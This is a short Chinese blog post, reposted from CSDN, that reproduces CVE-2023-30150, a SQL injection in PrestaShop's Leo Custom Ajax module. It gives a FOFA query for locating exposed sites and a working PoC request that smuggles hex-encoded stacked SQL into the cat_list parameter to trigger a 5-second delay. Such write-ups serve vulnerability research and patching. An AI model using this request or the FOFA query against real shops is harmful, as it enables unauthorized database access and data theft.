PrestaShop购物系统 SQL注入漏洞复现（CVE-2023-30150）

article2024/5/11 22:49:15/文章来源:https://blog.csdn.net/qq_41904294/article/details/135707859

0x01 产品简介

PrestaShop 是一个功能丰富，基于 PHP5 开发的 Web2.0 网上购物系统。PrestaShop 具有可定制，稳定等特点。整个系统只有 5.8MB，易于快速安装。

0x02 漏洞概述

PrestaShop 的部分主题中使用Leo Custom Ajax模块拓展，Leo Custom Ajax模块中可以在/modules/leocustomajax/leoajax.php中使用多个 GET 参数（cat_list、pro_info、pro_add、pro_cdown、pro_color）来操作HTTP请求，使未经身份验证的远程攻击者能够执行 SQL 注入，控制数据库权限获取敏感信息。

0x03 复现环境

FOFA："modules/leocustomajax"

0x04 漏洞复现

PoC

GET /modules/leocustomajax/leoajax.php?cat_list=1%29;select+0x73656c65637420736c6565702835293b+into+@a;prepare+b+from+@a;execute+b;-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 4.0; Trident/4.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

延时5

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mfbz.cn/a/341229.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！